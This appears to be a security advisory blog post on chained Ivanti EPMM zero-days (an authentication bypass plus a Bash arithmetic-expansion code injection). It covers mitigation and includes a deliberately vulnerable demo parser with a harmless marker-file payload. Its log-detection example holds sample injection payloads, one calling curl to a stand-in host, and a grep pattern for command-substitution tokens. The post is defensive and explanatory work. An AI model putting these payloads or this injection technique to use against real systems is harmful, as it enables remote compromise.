Two critical zero-day vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM) are under active mass exploitation, and CISA has now added CVE-2026-1340 to the Known Exploited Vulnerabilities (KEV) catalog as of April 8, 2026. Federal agencies face a remediation deadline of April 13. If you run EPMM anywhere in your environment, stop reading and start patching.
What Happened
Ivanti disclosed CVE-2026-1281 and CVE-2026-1340 after confirming both were being exploited as zero-days in the wild. The vulnerabilities affect Ivanti Endpoint Manager Mobile, a widely deployed mobile device management (MDM) platform used by enterprises and government agencies to manage corporate mobile devices, enforce policies, and distribute applications.
The flaws can be chained together. CVE-2026-1281 is an authentication bypass, and CVE-2026-1340 is a code injection vulnerability. Together they give an unauthenticated remote attacker code execution on the EPMM appliance.
Technical Details
CVE-2026-1340 (CVSS 9.8) is rooted in CWE-94 (Improper Control of Generation of Code, i.e. code injection). EPMM places user-supplied input into an executable construct without validating it: specifically, a Bash script, map-appstore-url, feeds attacker-controlled input into arithmetic expansion. Because Bash evaluates array subscripts, and therefore any command substitution inside them, while evaluating an arithmetic expression, an attacker can break out of the intended numeric context and have the system run arbitrary commands with the privileges of the EPMM application process.
CVE-2026-1281 is the authentication bypass that makes CVE-2026-1340 reachable without credentials. The combination is what makes this chain particularly dangerous: no authentication required, no user interaction needed, and the attack vector is network-based.
The attack characteristics:
- Vector: Network-based, no authentication, no user interaction
- Complexity: Low
- Impact: Full system compromise — arbitrary command execution with application-level privileges
- PoC Status: Public proof-of-concept code is available from multiple sources including Horizon3.ai and watchTowr
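To make the CWE-94 mechanism concrete, here is an added illustration written for this post. It is not Ivanti's map-appstore-url script and not code from the original advisory: a hypothetical helper that takes a "port" parameter, shown in the vulnerable form that drops the raw value into $(( )) beside a hardened form that allow-lists the value first. The function names, the parameter and the payload are assumptions; the demo payload only writes a marker file where a real attacker would run something worse.

```shell
#!/bin/sh
# Added illustration of CWE-94 via shell arithmetic expansion.
# This is NOT EPMM's map-appstore-url script; the helper names, the
# "port" parameter and the payload are assumptions made for the demo.

# Vulnerable: the raw value lands inside $(( )). Bash treats a value of
# the form name[expr] as an array subscript and performs command
# substitution while evaluating expr, so a value like 'a[$(cmd)]' runs
# cmd. The evaluation happens in an explicit bash child so the behaviour
# shown is bash's regardless of which shell runs this file.
vulnerable_parse_port() {
    bash -c 'port=$(( $1 + 0 )); printf "%s\n" "$port"' _ "$1"
}

# Hardened: allow-list the value before it reaches any code context.
# Prints the port and returns 0 only for a plain 1..65535 integer;
# otherwise prints nothing and returns 1.
safe_parse_port() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;   # empty, or any non-digit character
        0*)          return 1 ;;   # leading zero (octal in bash) or zero
    esac
    [ "${#1}" -le 5 ] || return 1  # bound the length before arithmetic
    port=$(( $1 + 0 ))
    [ "$port" -le 65535 ] || return 1
    printf '%s\n' "$port"
}

# Demo: the injected "command" only writes a marker file, standing in
# for whatever an attacker would really run. Prints "injected" if the
# payload executed, "clean" otherwise.
demo_injection() {
    marker=$(mktemp)
    vulnerable_parse_port "a[\$(echo hit > $marker)]" >/dev/null
    if [ -s "$marker" ]; then
        rm -f "$marker"
        echo injected
    else
        rm -f "$marker"
        echo clean
    fi
}

demo_injection
safe_parse_port 8443
safe_parse_port 'a[$(id)]' || echo "rejected by allow-list"
```

The point of the hardened version is that the check happens on the raw string, before any expansion: a regex or case pattern that admits only digits makes the later arithmetic safe, whereas trying to "escape" the value for an arithmetic context does not work because the subscript and command-substitution syntax is evaluated by the same expansion.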
Who Is Affected
Any organization running Ivanti Endpoint Manager Mobile (formerly MobileIron Core) that is exposed to the network. EPMM is commonly deployed in enterprises and government agencies for MDM. Given that MDM platforms by design have deep access to managed devices — including the ability to push configurations, install apps, and wipe devices — a compromised EPMM server represents a significant pivot point into an organization’s entire mobile fleet.
Telekom Security and Palo Alto Unit 42 have both reported observing mass exploitation attempts against Internet-facing EPMM instances. With public PoC code circulating, opportunistic scanning and exploitation will only increase.
Mitigation
Patch immediately. Ivanti has released RPM hotfixes:
- Apply RPM 12.x.0.x or RPM 12.x.1.x depending on your current EPMM version
- Only one RPM is required per version
- A permanent fix is expected in EPMM version 12.8.0.0
If you cannot patch immediately:
- Restrict network access to the EPMM management interface. It should not be exposed to the public Internet. Place it behind a VPN or firewall with strict ACLs.
- Monitor for exploitation indicators. Review EPMM logs for unexpected command execution, unusual API calls to the map-appstore-url endpoint, and any signs of post-exploitation activity (new accounts, modified configurations, unexpected outbound connections).
- Assume compromise if unpatched and exposed. If your EPMM instance has been Internet-facing without the patch, conduct a thorough investigation before simply applying the fix. Check for persistence mechanisms, lateral movement, and data exfiltration.
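As an added example for the log-monitoring step (not Ivanti's or this post's own tooling), the filter below flags request lines that carry the tokens a shell arithmetic or command-substitution payload needs, whether raw or percent-encoded. EPMM's real log format and request paths are not given here, so the sample lines are constructed in a generic combined-log style; the /api/example path, the "param" query key and the client addresses (RFC 5737 documentation ranges) are placeholders.

```shell
#!/bin/sh
# Added example for the "monitor for exploitation indicators" step.
# Not Ivanti's or the post's code. EPMM's real log format and request
# paths are not given on this page, so these access-log lines are
# constructed in a generic combined-log style; the /api/example path,
# the "param" query key and the client IPs (RFC 5737 ranges) are
# placeholders.
SAMPLE_LOG='203.0.113.7 - - [02/Apr/2026:11:02:13 +0000] "GET /healthcheck HTTP/1.1" 200 17
203.0.113.7 - - [02/Apr/2026:11:02:14 +0000] "GET /api/example?param=a%5B%24%28id%29%5D HTTP/1.1" 500 0
198.51.100.9 - - [02/Apr/2026:11:05:01 +0000] "GET /api/example?param=8443 HTTP/1.1" 200 42
198.51.100.9 - - [02/Apr/2026:11:05:02 +0000] "POST /api/example HTTP/1.1" 200 12
203.0.113.7 - - [02/Apr/2026:11:06:40 +0000] "GET /api/example?param=a[$(curl%20http://203.0.113.7/x)] HTTP/1.1" 500 0'

# Flags request lines carrying the tokens a shell arithmetic/command
# substitution payload needs, raw or percent-encoded: "$(" or %24%28,
# a backtick or %60, "${" or %24%7B. Case-insensitive so %7b == %7B.
# Reads stdin, writes matching lines to stdout.
flag_code_injection_attempts() {
    grep -iE '\$\(|%24%28|`|%60|\$\{|%24%7B'
}

# Unique client addresses among flagged lines, one per line.
flagged_sources() {
    printf '%s\n' "$SAMPLE_LOG" | flag_code_injection_attempts \
        | awk '{ print $1 }' | sort -u
}

# Number of flagged lines in the sample. A non-matching grep exits 1,
# which wc turns back into a clean "0" rather than an error.
count_flagged() {
    printf '%s\n' "$SAMPLE_LOG" | flag_code_injection_attempts \
        | wc -l | tr -d ' '
}

printf 'flagged lines: %s\n' "$(count_flagged)"
flagged_sources
```

In real use, feed the actual EPMM request logs in place of SAMPLE_LOG and, once you know the request path that reaches the vulnerable script, add a path filter to cut noise. Hits are leads, not verdicts, and the reverse also holds: an attacker can encode or split a payload in ways this pattern misses, so no hits does not clear an instance that was exposed unpatched.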
Timeline
- Early 2026: Ivanti confirms zero-day exploitation of CVE-2026-1281 and CVE-2026-1340
- March 2026: Mass exploitation observed by Telekom Security and Unit 42
- April 8, 2026: CISA adds CVE-2026-1340 to the KEV catalog
- April 13, 2026: CISA remediation deadline for federal agencies